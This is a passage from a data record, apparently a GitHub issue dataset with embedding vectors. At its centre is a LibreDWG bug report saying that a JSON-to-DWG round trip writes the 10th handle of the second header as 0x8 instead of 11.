-0.0035280557349324226, 0.005468147806823254, 0.021791329607367516, 0.011850475333631039, -0.00732697919011116, 0.008552657440304756, -0.017917918041348457, 0.00309635978192091, 0.01890658587217331, -0.005332713946700096, 0.017227204516530037, 0.009311087429523468, 0.002339622238650918, 0.0006847881595604122, 0.005017829593271017, 0.023700950667262077, 0.01052999310195446, 0.0037312067579478025, 0.033452197909355164, -0.01111235935240984, 0.0022786769550293684, 0.006724298000335693, -0.010042430832982063, 0.043934788554906845, 0.001799579244107008, 0.021886134520173073, -0.01997651532292366, -0.005258224904537201, -0.010116919875144958, -0.0066159507259726524, 0.00036736472975462675, 0.008349506184458733, 0.013123554177582264, -0.016712555661797523, 0.012764654122292995, -0.007665564306080341, -0.012866229750216007, -0.01867634803056717, 0.006257050670683384, 0.0060132695361971855, 0.015168608166277409, -0.015087347477674484, -0.01843256689608097, -0.005752559285610914, 0.007089969702064991, 0.007645249366760254, -0.017240747809410095, -0.012236461974680424, -0.017267834395170212, -0.0033486057072877884, 0.0059320093132555485, 0.002957539865747094, 0.013170956633985043, 0.026517977938055992, -0.010191407985985279, 0.0037819943390786648, -0.00033435269142501056, -0.0018859184347093105, 0.0020941481925547123, 0.010245582088828087, 0.022509131580591202, -0.001250225119292736, 0.0048993248492479324, -0.012175516225397587, 0.005309012718498707, 0.0008337655453942716, -0.014030962251126766, 0.013103239238262177, -0.00048671592958271503, -0.004774048458784819, -0.006832645274698734, -0.004449007101356983, -0.02544804848730564, 0.014951913617551327, -0.002143243094906211, -0.022482043132185936, -0.0010292984079569578, 0.002899980405345559, 0.017376182600855827, 0.0031065172515809536, -0.026504432782530785, -0.00584059115499258, -0.004523495677858591, 0.00578641751781106, -0.0058744498528540134, 0.007875487208366394, 0.007245718967169523, -0.02043699100613594, -0.008058322593569756, -0.01665838249027729, 0.002334543503820896, 0.00738792447373271, -0.0009201047359965742, -0.01581869088113308, -0.01192496344447136, -0.004151051864027977, 0.013252216391265392, 0.008004149422049522, -0.025515764951705933, 0.0018012721557170153, -0.0029236814007163048, -0.004851922858506441, -0.011816616170108318, 0.02122250758111477, 0.0008413837058469653, 0.01999005861580372, 0.007238947320729494, 0.0011808151612058282, -0.012019767425954342, 0.005996340420097113, -0.006775085814297199, 0.004327116068452597, 0.014071592129766941, -0.017416812479496002, 0.0031826989725232124, 0.0023768667597323656, -0.011288424022495747, -0.013008435256779194, -0.013218358159065247, -0.004259399138391018, -0.014748762361705303, 0.00578641751781106, 0.017633507028222084, 0.006561777088791132, 0.02638254314661026, -0.010496134869754314, -0.0002370095025980845, 0.0006733608897775412, -0.007184773683547974, 0.0050483024679124355, 0.008809981867671013, -0.021506918594241142, -0.0006259590154513717, 0.00002376707925577648, -0.000710605236236006, 0.009107936173677444, -0.006026812829077244, -0.008864155039191246, -0.014735219068825245, -0.006859731860458851, 0.02253621816635132, 0.009392348118126392, 0.009195968508720398, -0.015087347477674484, -0.02360614575445652, 0.0005091471830382943, -0.013110010884702206, 0.017064683139324188, -0.0027120658196508884, 0.0021466289181262255, 0.010211723856627941, 0.011423857882618904, -0.004381289705634117, -0.0005607813945971429, -0.007638477720320225, 0.022712280973792076, 0.01017786469310522, 0.011633780784904957, 0.0165094044059515, -0.008234387263655663, 0.008809981867671013, 0.021032899618148804, 0.017945004627108574, 0.008823525160551071, 0.033370938152074814, -0.01319127157330513, -0.003981759771704674, 0.0018622174393385649, 0.01619790680706501, -0.010191407985985279, -0.005877835676074028, -0.01705113984644413, -0.03407519310712814, 0.010225267149508, 0.01044873334467411, 0.0064026424661278725, -0.005972639191895723, -0.01690216362476349, 0.012358352541923523, 0.015872864052653313, -0.005783031694591045, 0.024256229400634766, 0.00041561308898963034, -0.011674410663545132, 0.01029298361390829, 0.004019003827124834, 0.01018463633954525, 0.01419348269701004, 0.003216557437554002, 0.0029592327773571014, -0.013631432317197323, 0.000005640878953272477, 0.008931872434914112, -0.009338174015283585, -0.002688364824280143, 0.01780957169830799, -0.011356140486896038, 0.013468910939991474, 0.010502906516194344, 0.007117056753486395, -0.01874406635761261, 0.018920129165053368, -0.007943203672766685, 0.00688343308866024, 0.0070357960648834705, -0.0008261473849415779, 0.0025241512339562178, 0.022319523617625237, -0.010123691521584988, -0.014139309525489807, 0.005478305276483297, -0.002664663828909397, -0.011586378328502178, 0.004929797723889351, 0.017389725893735886, -0.004516724031418562, 0.007685879245400429, -0.009595498442649841, 0.0023057637736201286, -0.0013526470866054296, 0.015222781337797642, 0.026274194940924644, 0.01713240146636963, 0.015534279868006706, 0.010198180563747883, 0.017389725893735886, 0.009981486015021801 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Test scenario: Input DWG file (blank file from AutoCAD 2000): [test.dwg.gz](https://github.com/LibreDWG/libredwg/files/12361564/test.dwg.gz) When I convert to JSON, 10th handle in JSON: ``` { "nr": 10, "hdl": [ 11 ] }, ``` Which is backup of ```VX_CONTROL_OBJECT: (3.1.B) abs:11 [H 0]``` After conversion from this JSON to DWG, result will be: ``` handles[10].num_hdl: 1 [RCd 0] handles[10].nr: 10 [RCd 0] hdl: { 0x8 } [*RC] ``` As I see, each time will be 0x8 from JSON conversion to DWG. This is bad.
Issue in 10th handle in second header
https://api.github.com/repos/LibreDWG/libredwg/issues/803/comments
3
2023-08-16T16:35:11
2023-08-17T14:08:09Z
https://github.com/LibreDWG/libredwg/issues/803
1,853,575,310
803
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Issue in 10th handle in second header Issue date: --- start body --- Test scenario: Input DWG file (blank file from AutoCAD 2000): [test.dwg.gz](https://github.com/LibreDWG/libredwg/files/12361564/test.dwg.gz) When I convert to JSON, 10th handle in JSON: ``` { "nr": 10, "hdl": [ 11 ] }, ``` Which is backup of ```VX_CONTROL_OBJECT: (3.1.B) abs:11 [H 0]``` After conversion from this JSON to DWG, result will be: ``` handles[10].num_hdl: 1 [RCd 0] handles[10].nr: 10 [RCd 0] hdl: { 0x8 } [*RC] ``` As I see, each time will be 0x8 from JSON conversion to DWG. This is bad. --- end body ---
721
[ -0.024513600394129753, 0.0016934251179918647, -0.009167179465293884, 0.006022805348038673, 0.040892500430345535, 0.021588237956166267, 0.006715036928653717, 0.06939523667097092, -0.020571399480104446, -0.01636325754225254, 0.021556951105594635, 0.016613556072115898, 0.022417351603507996, 0.008995098993182182, -0.00034587131813168526, 0.03469761833548546, -0.032914239913225174, 0.0005959253176115453, -0.0344473198056221, -0.04461568966507912, 0.020665261894464493, -0.009542626328766346, -0.013414430432021618, 0.05121731013059616, -0.01921040192246437, 0.01549503579735756, -0.0010080377105623484, -0.004329380113631487, -0.003531554015353322, 0.02490469068288803, -0.03488533943891525, 0.026703711599111557, 0.01792762242257595, -0.0010461690835654736, 0.04223785549402237, 0.003832694375887513, 0.006355233024805784, 0.055566247552633286, -0.009644309990108013, 0.020399320870637894, -0.006097112782299519, -0.04521014913916588, -0.022542500868439674, 0.031787898391485214, 0.0005054854555055499, 0.010614216327667236, 0.020117733627557755, 0.019116541370749474, -0.017755543813109398, 0.017317520454525948, 0.0006702326354570687, -0.04821373149752617, -0.02618747018277645, -0.02789262868463993, -0.003285166574642062, -0.027830053120851517, 0.047994717955589294, 0.04480341449379921, -0.00753632839769125, 0.02604667842388153, -0.03213205933570862, 0.006007161922752857, -0.020712193101644516, 0.014931864105165005, -0.02434151992201805, 0.01549503579735756, -0.0297072920948267, 0.04536658525466919, -0.01806841604411602, 0.013797699473798275, 0.00026765308575704694, 0.02075912430882454, 0.05850725248456001, 0.030896209180355072, 0.028799960389733315, -0.01210036315023899, 0.03203819692134857, 0.020821698009967804, -0.010755009949207306, 0.01722365990281105, -0.03842080384492874, 0.045147575438022614, -0.005608248524367809, 0.014290474355220795, -0.005291464738547802, -0.007755339611321688, -0.02146308869123459, -0.0718982145190239, -0.008572719991207123, -0.011396399699151516, -0.04026675596833229, 0.04467826709151268, -0.017004648223519325, -0.050998300313949585, 0.004079082049429417, -0.020884273573756218, -0.03842080384492874, -0.003296899376437068, -0.04452182725071907, -0.007231277413666248, -0.03413444384932518, 0.02190111018717289, -0.02506112866103649, 0.016676131635904312, 0.024857761338353157, 0.008760443888604641, 0.04082992672920227, 0.0004099125217180699, -0.007293852046132088, 0.09605201333761215, 0.04930878430604935, -0.009104604832828045, -0.021994972601532936, -0.024810830131173134, -0.009088960476219654, 0.015573253855109215, 0.012976408004760742, -0.03457246720790863, 0.0036762577947229147, 0.02318388968706131, -0.016895141452550888, -0.008549255318939686, -0.008040836080908775, -0.01692643016576767, -0.017114153131842613, 0.0074698431417346, -0.04561688378453255, -0.01889752969145775, -0.029363131150603294, 0.0018977703293785453, -0.04370835795998573, -0.03438474237918854, 0.013038982637226582, 0.002561647677794099, 0.0053344848565757275, 0.0058820126578211784, -0.004810422658920288, 0.0068128095008432865, -0.0028882089536637068, -0.008447570726275444, -0.04267587885260582, -0.07940717041492462, 0.014259187504649162, -0.025139346718788147, -0.02646905556321144, 0.034228306263685226, 0.0010794118279591203, 0.00330863194540143, 0.00468918401747942, 0.015119588002562523, 0.003079843707382679, -0.00930797215551138, 0.0017315564909949899, 0.021713387221097946, 0.03698159009218216, -0.01877238042652607, -0.02901897206902504, 0.02391914092004299, -0.01215511653572321, -0.03419702127575874, 0.011693628504872322, -0.021306652575731277, -0.024216370657086372, -0.020587043836712837, -0.03344612568616867, 0.027845697477459908, 0.04952779784798622, 0.04029804468154907, -0.010434314608573914, 0.01038738340139389, -0.020602688193321228, -0.010496889241039753, 0.030896209180355072, 0.004176854621618986, -0.035636235028505325, -0.009839856065809727, -0.01563582941889763, 0.0034709349274635315, -0.004399776458740234, -0.026218758895993233, 0.019304264336824417, -0.052281077951192856, 0.011896995827555656, 0.0012035833206027746, 0.026375195011496544, -0.04420895501971245, 0.03275780379772186, -0.02348111942410469, -0.005772506818175316, 0.0264534130692482, -0.0035863069351762533, 0.008072123862802982, 0.0183656457811594, -0.019726643338799477, 0.009996292181313038, -0.05209335684776306, -0.026688067242503166, -0.06041577830910683, 0.030254820361733437, 0.010934911668300629, 0.04039190337061882, 0.04101765155792236, 0.012350661680102348, -0.010191838257014751, -0.030692841857671738, 0.016957717016339302, -0.02631261944770813, 0.021431801840662956, -0.006222262047231197, -0.029660360887646675, -0.0034826677292585373, -0.04164339601993561, 0.034791477024555206, 0.00045317699550651014, -0.004102547187358141, 0.02675064280629158, 0.0017481779213994741, 0.0018039083806797862, -0.003287122119218111, -0.01864723116159439, 0.02107199653983116, -0.040204182267189026, -0.0030270463321357965, 0.001712001976557076, -0.036042969673871994, 0.020868629217147827, 0.00032387246028520167, 0.025358356535434723, -0.0377950593829155, -0.020555756986141205, 0.028534017503261566, -0.015753155574202538, 0.00636696582660079, 0.0039324224926531315, -0.021885467693209648, 0.01307809166610241, -0.004524925723671913, -0.028502730652689934, -0.03382157161831856, -0.030254820361733437, 0.019398126751184464, 0.055534958839416504, -0.022260913625359535, -0.05005967989563942, -0.00019114585302304476, 0.04057962819933891, -0.004536658525466919, 0.007817914709448814, 0.012037788517773151, 0.03522950038313866, 0.02673499844968319, -0.014947507530450821, 0.035792671144008636, 0.00946440827101469, 0.032663941383361816, -0.006902760826051235, 0.038201794028282166, 0.04849531501531601, 0.019022678956389427, -0.02743896283209324, 0.00732122827321291, 0.027204308658838272, -0.04599233344197273, -0.010207481682300568, 0.016175534576177597, -0.010606395080685616, -0.02889382280409336, 0.004829977173358202, 0.008862127549946308, -0.02560865506529808, 0.042769741266965866, -0.006026716437190771, -0.007110039237886667, 0.011951749213039875, -0.017114153131842613, 0.012389770708978176, 0.0032382356002926826, 0.013070269487798214, 0.03366513550281525, -0.0066915713250637054, -0.018537726253271103, 0.019304264336824417, 0.013555223122239113, 0.06107281148433685, -0.018866242840886116, -0.015620185062289238, 0.002096249256283045, -0.006511669605970383, -0.042769741266965866, -0.005271910224109888, -0.013922848738729954, 0.006468649487942457, -0.0021901109721511602, -0.03130294382572174, -0.012452345341444016, -0.011646697297692299, 0.036355841904878616, -0.02362191118299961, 0.02975422330200672, -0.03454117849469185, 0.020133377984166145, -0.016253752633929253, -0.008729157038033009, -0.01521345041692257, -0.009362724609673023, 0.012381949461996555, 0.0032753893174231052, -0.0032890774309635162, -0.036762576550245285, 0.0010657237144187093, 0.04492856562137604, -0.04327033832669258, -0.01919475942850113, -0.029206695035099983, -0.039171699434518814, -0.038076646625995636, 0.007293852046132088, -0.011279071681201458, -0.021885467693209648, -0.02515498921275139, -0.04361449554562569, -0.002956649987027049, 0.015174340456724167, 0.01237412728369236, 0.0011977170361205935, -0.03353998810052872, -0.04311390221118927, 0.02745460718870163, -0.0318974032998085, -0.007598903030157089, 0.0013619753299281001, -0.02431023307144642, -0.022652005776762962, -0.009417477063834667, -0.002729817060753703, -0.044459253549575806, -0.02019595168530941, -0.012335018254816532, -0.0500909686088562, -0.011709271930158138, -0.0029077634681016207, 0.03754476085305214, -0.034071870148181915, -0.014415623620152473, 0.029926303774118423, -0.039641011506319046, 0.009902430698275566, -0.01993001066148281, 0.018021484836935997, 0.031052645295858383, 0.0009831056231632829, 0.029097190126776695, -0.04170597344636917, 0.0344473198056221, -0.009135891683399677, -0.0061166672967374325, -0.034478604793548584, -0.022276557981967926, 0.015729689970612526, 0.0009982604533433914, -0.011638876050710678, -0.013915026560425758, 0.025702517479658127, 0.024278946220874786, -0.0009840833954513073, 0.0036136831622570753, -0.022964878007769585, -0.010755009949207306, -0.04380222037434578, -0.02732945792376995, -0.012835615314543247, -0.01038738340139389, -0.022292202338576317, -0.014689387753605843, -0.04054834321141243, -0.013257993385195732, 0.014423445798456669, -0.0038796253502368927, 0.013977601192891598, 0.012726109474897385, -0.02022724039852619, -0.006542956922203302, 0.0011194987455382943, -0.03995388373732567, 0.020242882892489433, 0.02035238966345787, -0.021384870633482933, 0.003934378270059824, 0.019257333129644394, -0.02176031842827797, 0.0027004850562661886, -0.004767402540892363, -0.017004648223519325, -0.05547238513827324, -0.0015154785942286253, 0.07227366417646408, -0.017974553629755974, 0.005146760959178209, 0.01152154803276062, -0.026390837505459785, 0.005154582671821117, -0.005936765111982822, -0.0004939971258863807, 0.0008423128165304661, -0.029237981885671616, 0.04718124866485596, -0.019976941868662834, 0.00021876666869502515, 0.03244493156671524, 0.009221931919455528, 0.01450948603451252, 0.01210036315023899, 0.013586509972810745, 0.004419331438839436, 0.009143713861703873, -0.014501663856208324, 0.0018860376439988613, 0.01866287551820278, -0.039891310036182404, 0.007227366324514151, 0.0012622469803318381, -0.03454117849469185, -0.01650405116379261, 0.025843311101198196, -0.02944134920835495, -0.0149396862834692, -0.03088056668639183, 0.010395205579698086, 0.04555431008338928, -0.0006624108063988388, 0.00307788816280663, 0.03175660967826843, 0.027564112097024918, 0.008713513612747192, -0.009980648756027222, -0.01216293778270483, -0.0011136323446407914, -0.036606140434741974, 0.009167179465293884, 0.06207400560379028, 0.022104477509856224, 0.01694207265973091, -0.005213246680796146, 0.009566091932356358, 0.021822892129421234, 0.011036595329642296, -0.053970593959093094, -0.023121315985918045, 0.02818985842168331, -0.009902430698275566, 0.0055965157225728035, 0.011161744594573975, -0.01822485215961933, -0.017677325755357742, -0.0019339462742209435, -0.01051253266632557, 0.015831373631954193, -0.02033674530684948, 0.026140538975596428, 0.0010901668574661016, -0.026109252125024796, 0.012687000446021557, -0.021150214597582817, -0.010113620199263096, 0.027767479419708252, 0.020821698009967804, 0.03826436772942543, -0.017865048721432686, 0.005737308878451586, 0.005729487165808678, -0.016832567751407623, -0.021291008219122887, 0.006011072546243668, -0.0029977145604789257, -0.023715773597359657, 0.02814292721450329, -0.05074800178408623, -0.0150726567953825, -0.005831170827150345, -0.03275780379772186, -0.013132844120264053, -0.01964842528104782, 0.019585849717259407, -0.0016024964861571789, -0.00384247163310647, 0.0010246591409668326, 0.04952779784798622, -0.02233913354575634, -0.00576077401638031, 0.03170967847108841, 0.03325840085744858, 0.005537852179259062, -0.0045327479019761086, -0.04765056073665619, -0.006703304126858711, 0.01805277168750763, -0.01719237118959427, -0.02675064280629158, 0.03541722521185875, 0.02574944868683815, 0.01680128090083599, -0.025248851627111435, 0.028346294537186623, -0.00321672554127872, 0.054408617317676544, -0.0031619728542864323, -0.007551972288638353, 0.03202255070209503, 0.008236382156610489, -0.032351069152355194, 0.0014822358498349786, -0.033227112144231796, -0.0181935653090477, -0.013031160458922386, 0.0010950554860755801, -0.005835081450641155, -0.01464245654642582, -0.01921040192246437, 0.0026711532846093178, 0.01252274215221405, -0.009980648756027222, -0.03257007896900177, 0.007982173003256321, 0.01780247502028942, 0.02901897206902504, 0.0353233627974987, 0.001618140027858317, 0.006429540459066629, 0.011717094108462334, 0.0009723506518639624, 0.00348853413015604, 0.0009278639918193221, -0.014204434119164944, 0.02247992530465126, -0.007395535707473755, 0.011912640184164047, -0.02146308869123459, 0.03914041444659233, -0.004122101701796055, 0.014501663856208324, 0.014047998003661633, 0.039641011506319046, -0.035198211669921875, 0.008486680686473846, 0.0020121645648032427, 0.016832567751407623, -0.03416573256254196, 0.01733316481113434, 0.01820920966565609, -0.028643524274230003, 0.001638672430999577, -0.020446250215172768, -0.0003730032767634839, 0.024388451129198074, -0.02743896283209324, 0.027110446244478226, 0.014212256297469139, -0.004399776458740234, 0.04226914420723915, -0.02276151068508625, 0.010223125107586384, 0.011560657992959023, 0.0014529040781781077, -0.010911446064710617, -0.012022145092487335, -0.02202625945210457, 0.010755009949207306, 0.02476389892399311, -0.04577331990003586, -0.012765218503773212, 0.028127282857894897, -0.016519695520401, -0.01892881654202938, -0.010606395080685616, -0.01676999405026436, -0.011498083360493183, -0.009542626328766346, -0.014454732649028301, -0.007301673758774996, -0.004395865835249424, 0.024232015013694763, -0.042300429195165634, -0.0016846256330609322, 0.0067580570466816425, -0.012561851181089878, 0.013125022873282433, -0.0023856565821915865, -0.04048576578497887, -0.004329380113631487, 0.014040175825357437, -0.011646697297692299, 0.010356096550822258, 0.0013619753299281001, 0.01451730728149414, 0.038608528673648834, -0.007411179132759571, -0.02304309606552124, 0.019398126751184464, 0.029191050678491592, -0.0022644184064120054, -0.0039910865016281605, 0.02803342230618, 0.006722858641296625, -0.014525129459798336, -0.03529207408428192, 0.008572719991207123, -0.0066993930377066135, -0.007493308745324612, -0.013070269487798214, -0.009863321669399738, 0.020524470135569572, 0.02745460718870163, 0.03372770920395851, 0.015620185062289238, -0.0004262894799467176, 0.0011820733780041337, -0.016253752633929253, 0.02573380433022976, -0.014924042858183384, -0.01778683066368103, 0.024810830131173134, -0.0254835058003664, -0.0035960841923952103, -0.013578688725829124, 0.008471036329865456, -0.016738705337047577, -0.038045357912778854, 0.008314600214362144, -0.0012651801807805896, -0.00732122827321291, -0.012037788517773151, -0.022292202338576317, -0.00796261802315712, -0.034509893506765366, 0.011052238754928112, 0.04205013066530228, 0.012780861929059029, -0.01580790802836418, -0.023246465250849724, 0.00618315301835537, -0.014220078475773335, 0.014376514591276646, -0.012389770708978176, 0.019710998982191086, -0.01861594431102276, -0.01051253266632557, 0.02132229506969452, -0.005964141804724932, 0.023793991655111313, 0.013860274106264114, -0.031381163746118546, -0.0318974032998085, 0.007422911934554577, 0.011419864371418953, 0.011505904607474804, 0.007489397656172514, 0.008494501933455467, 0.046054907143116, -0.004262894857674837, -0.013758590444922447, -0.0017403560923412442, -0.028346294537186623, -0.016863854601979256, -0.004028239753097296, 0.022386062890291214, 0.004055616445839405, 0.007982173003256321, 0.017411382868885994, 0.024435382336378098, 0.009902430698275566, -0.006245727185159922, 0.005256266333162785, 0.014861468225717545, -0.029503924772143364, -0.02391914092004299, 0.002440409502014518, -0.014665922150015831, 0.011075704358518124, -0.007755339611321688, 0.004916016943752766, 0.015706224367022514, -0.016034740954637527, 0.006417807657271624, 0.00909678265452385, -0.0181935653090477, -0.0007816936704330146, 0.002866698894649744, 0.02149437554180622, 0.010801940225064754, -0.008478858508169651, -0.02121279016137123, 0.009268863126635551, -0.03366513550281525, 0.022871017456054688, 0.024701323360204697, -0.025295782834291458, 0.03460375592112541, -0.0011478528613224626, -0.01805277168750763, -0.017239302396774292, -0.03679386526346207, 0.017427027225494385, 0.014321762137115002, 0.0007479620398953557, 0.0033477412071079016, 0.034353457391262054, -0.0028060798067599535, -0.0018537725554779172, 0.03795149549841881, 0.020164664834737778, -0.028518375009298325, 0.02416943944990635, -0.03102135844528675, 0.009088960476219654, -0.022151408717036247, -0.01581573113799095, 0.004642253275960684, 0.0183656457811594, -0.01889752969145775, 0.0021392691414803267, -0.02018030919134617, -0.02815856970846653, 0.014188790693879128, -0.030145313590765, 0.006761967670172453, -0.004650074988603592, 0.009472230449318886, -0.0003387827891856432, 0.030333038419485092, 0.020289814099669456, -0.027345100417733192, -0.03360256180167198, -0.006609442178159952, 0.019163472577929497, -0.027689261361956596, 0.02615618333220482, 0.034791477024555206, 0.014321762137115002, 0.010199660435318947, -0.003095487365499139, -0.00030456233071163297, -0.000039048016333254054, 0.022698936983942986, -0.01720801554620266, -0.005393148399889469, -0.004204230848699808, -0.004974680952727795, 0.0010803896002471447, -0.007638012059032917, -0.01236630603671074, 0.01705157943069935, 0.0017921756953001022, 0.0163476150482893, -0.0044662621803581715, 0.0017354674637317657, -0.003926556091755629, 0.01591741479933262, -0.00771623058244586, 0.016848212108016014, 0.00937836803495884, -0.006730680353939533, 0.0008784887613728642, -0.03895268961787224, 0.02288665995001793, 0.034791477024555206, 0.006621174979954958, 0.046868376433849335, -0.014243544079363346, 0.016269396990537643, -0.015299489721655846, 0.008643116801977158, 0.03328968957066536, -0.020712193101644516, 0.0008784887613728642, 0.030833635479211807, -0.05005967989563942, -0.014165325090289116, 0.004540569614619017, -0.00022402196191251278, -0.010833228006958961, -0.03160017356276512, -0.030817991122603416, -0.04101765155792236, 0.018396932631731033, 0.010950555093586445, -0.0066798385232687, -0.018381288275122643, -0.00860400777310133, 0.025655586272478104, -0.004536658525466919, 0.015307311899960041, -0.010489067994058132, 0.03432216867804527, 0.006233994849026203, -0.005866368766874075, -0.04761927202343941, -0.004978591576218605, 0.02704787068068981, 0.008502324111759663, -0.007516773883253336, 0.015557610429823399, -0.022542500868439674, -0.0021412246860563755, -0.032351069152355194, -0.01267135702073574, -0.017974553629755974, -0.010778475552797318, -0.004802600480616093, -0.008650938980281353, 0.018037129193544388, -0.028049064800143242, -0.013156309723854065, 0.017865048721432686, 0.0248734038323164, -0.016269396990537643, 0.0014167281333357096, 0.007970440201461315, -0.03482276573777199, 0.03045818768441677, 0.05916428565979004, -0.02576509304344654, 0.014196612872183323, 0.008447570726275444, -0.033227112144231796, -0.005604337900876999, -0.01805277168750763, 0.02304309606552124, 0.005631714127957821, 0.034071870148181915, 0.030207889154553413, -0.0028217234648764133, -0.006808898877352476, -0.01138857752084732, -0.027939559891819954, -0.025984102860093117, 0.0005191736272536218, 0.003412271151319146, -0.0021666456013917923, -0.007825735956430435, 0.024810830131173134, 0.00012233822781126946, -0.024372806772589684, 0.002620311453938484, 0.01080976240336895, -0.004282449372112751, -0.04101765155792236, -0.02005515992641449, 0.0005084186559543014, -0.011458974331617355, 0.034916628152132034, 0.04036061838269234, 0.019804861396551132, -0.014892755076289177, 0.030348680913448334, -0.003521776758134365, -0.004270716570317745, -0.002547959564253688, 0.036637429147958755, -0.006280925590544939, -0.023997358977794647, 0.04392737150192261, 0.00018356845248490572, -0.0062379054725170135, -0.0044936384074389935, 0.002778703346848488, -0.020727837458252907, -0.009839856065809727, -0.0284714438021183, -0.002526449505239725, -0.0033438303507864475, -0.015612362883985043, -0.009503517299890518, 0.03766990825533867, -0.010841049253940582, -0.005205424502491951, -0.036919016391038895, -0.004509282298386097, 0.02673499844968319, 0.017567818984389305, 0.018850598484277725, -0.014884932897984982, 0.021228432655334473, -0.007638012059032917, -0.003838560776785016, 0.035511087626218796, -0.034228306263685226, 0.016832567751407623, -0.018741093575954437, -0.018584657460451126, -0.012773040682077408, -0.02445102483034134, 0.03935942426323891, -0.030817991122603416, -0.04668065160512924, 0.02432587556540966, 0.028252432122826576, 0.005420524626970291, -0.03300810232758522, -0.007778805214911699, 0.01052817702293396, -0.00658206595107913, -0.03042690083384514, 0.007278208155184984, 0.013844630680978298, 0.0008662671316415071, -0.030896209180355072, 0.020665261894464493, 0.022386062890291214, 0.013602154329419136, 0.0040321508422493935, 0.035636235028505325, -0.005111562553793192, 0.009112426079809666, 0.0057685961946845055, -0.02587459795176983, 0.01822485215961933, -0.006136221811175346, -0.012710466049611568, 0.009065495803952217, 0.018240496516227722, -0.02646905556321144, -0.007086573634296656, 0.002669197740033269, 0.004028239753097296, 0.01316413190215826, -0.0386711023747921, -0.036762576550245285, -0.000022212761905393563, 0.017442669719457626, 0.0149396862834692, 0.007575437892228365, -0.00551047595217824, 0.05462762713432312, -0.014556416310369968, 0.016316328197717667, 0.0028275898657739162, -0.01691078580915928, 0.014626813121140003, -0.003625415964052081, -0.032789092510938644, 0.008963811211287975, 0.035198211669921875, 0.036480993032455444, -0.011537192389369011, -0.01138857752084732, -0.008314600214362144, -0.004235518164932728, -0.0326952300965786, 0.010481245815753937, -0.04045448079705238, 0.012577494606375694, 0.013414430432021618, -0.032914239913225174, 0.002442364813759923, -0.028049064800143242, 0.025671230629086494, -0.015393352136015892, -0.006468649487942457, -0.03516692668199539, 0.035479798913002014, 0.0012192269787192345, 0.019664067775011063, 0.008345887064933777, -0.014071463607251644, -0.005733397789299488, 0.008361531421542168, -0.007462021429091692, 0.03310196474194527, -0.01921040192246437, -0.025577368214726448, 0.0006321012624539435, 0.01806841604411602, 0.03566752374172211, 0.01719237118959427, -0.0341031588613987, 0.015111765824258327, -0.011498083360493183, 0.006292658392339945, 0.011576301418244839, 0.008963811211287975, -0.024404093623161316, 0.0002923407300841063, 0.02290230430662632, 0.0008012482430785894, 0.0000740018003853038, -0.01116956677287817, 0.011951749213039875, 0.03003580868244171, -0.05190563201904297, 0.005142849870026112, -0.030254820361733437, -0.011826599948108196, 0.008165985345840454, -0.02687579207122326, 0.037482187151908875, 0.014493841677904129, 0.015588897280395031, 0.018130991607904434, 0.00044168869499117136, 0.004090814385563135, -0.01558107603341341, 0.01158412266522646, 0.023027453571558, 0.005784239619970322, -0.009761638008058071, 0.024388451129198074, 0.029848085716366768, 0.0049942354671657085, -0.04793214425444603, -0.0020023873075842857, -0.00321672554127872, -0.00015655871538911015, 0.040047746151685715, -0.003189349314197898, -0.01515087578445673, 0.030771059915423393, -0.011122635565698147, 0.0028549660928547382, 0.011990858241915703, 0.038764964789152145, -0.017411382868885994, -0.00505289901047945, -0.01457206066697836, -0.04201884567737579, 0.007274297531694174, 0.011318180710077286, 0.010833228006958961, -0.01947634480893612, 0.015839196741580963, -0.0031111310236155987, 0.007845290936529636, -0.020086446776986122, -0.009573914110660553, -0.019116541370749474, -0.018318714573979378, -0.03042690083384514, 0.005283643025904894, -0.014634635299444199, -0.017254946753382683, 0.02235477603971958, 0.053782869130373, 0.009839856065809727, -0.025389645248651505, -0.016832567751407623, -0.009699063375592232, 0.022245271131396294, 0.016441475600004196, -0.01023094728589058, -0.002960560843348503, 0.004998146090656519, 0.03028610721230507, 0.009933717548847198, 0.07233624160289764, -0.009175000712275505, 0.028346294537186623, 0.000046839290007483214, -0.02104070968925953, -0.045022424310445786, 0.006707215216010809, 0.002544048707932234, -0.0022546411491930485, -0.02377834916114807, -0.005213246680796146, -0.012913833372294903, -0.022104477509856224, -0.015956522896885872, -0.025389645248651505, -0.002434543101117015, -0.011200853623449802, 0.011036595329642296, 0.01130253728479147, 0.013602154329419136, -0.005236711818724871, 0.01500226091593504, 0.018881885334849358, -0.017145439982414246, 0.00743855582550168, -0.009550448507070541, 0.010011936537921429, -0.011427686549723148, -0.011286893859505653, -0.0028315007220953703, -0.010833228006958961, 0.012757397256791592, -0.02559301257133484, 0.04849531501531601, 0.02431023307144642, 0.00845539290457964, -0.01748960092663765, -0.014822358265519142, -0.02290230430662632, -0.026656780391931534, 0.010066688992083073, 0.004880819004029036, -0.024638749659061432, -0.04101765155792236, 0.030630268156528473, 0.10600137710571289, 0.0063513219356536865, -0.007055286318063736, 0.021416157484054565, 0.0005475277430377901, -0.005111562553793192, 0.011396399699151516, 0.017129797488451004, -0.008721334859728813, 0.011013129726052284, 0.010191838257014751, 0.00465398607775569, -0.020680906251072884, 0.01500226091593504, 0.009839856065809727, -0.0062965694814920425, -0.004607054870575666, -0.011951749213039875, 0.02947263792157173, 0.00643345108255744, -0.03594910725951195, 0.011138278990983963, 0.0063239457085728645, -0.03594910725951195, 0.013430073857307434, -0.0024658304173499346, -0.022949235513806343, -0.03885882720351219, -0.04320776090025902, 0.00037202556268312037, 0.0011468750890344381, -0.01791197992861271, 0.0014577927067875862, 0.012663534842431545, 0.008478858508169651, 0.015573253855109215, 0.012272443622350693, 0.0006619219784624875, -0.0008960878476500511, -0.009065495803952217, -0.007442466448992491, -0.018631586804986, 0.02518627792596817, -0.021885467693209648, 0.014924042858183384, 0.011920461431145668, 0.014227899722754955, -0.0009547515073791146, -0.008760443888604641, -0.010841049253940582, 0.006085379980504513, -0.0004614876816049218, 0.02047753892838955, -0.0011820733780041337, 0.012929476797580719, 0.020414963364601135, 0.011591944843530655, 0.0030583336483687162, -0.01280432753264904, 0.004724382422864437, 0.0015281890518963337, -0.008361531421542168, -0.013774233870208263, -0.01777118630707264, 0.006355233024805784, 0.0008413350442424417, -0.04355192184448242, 0.02573380433022976, -0.013688193634152412, 0.02928491309285164, -0.00909678265452385, 0.01662920042872429, 0.00444279657676816, -0.013797699473798275, 0.01917911507189274, 0.03225720673799515, 0.01778683066368103, 0.041768547147512436, -0.030786704272031784, -0.02260507456958294, 0.005494832061231136, 0.031349875032901764, 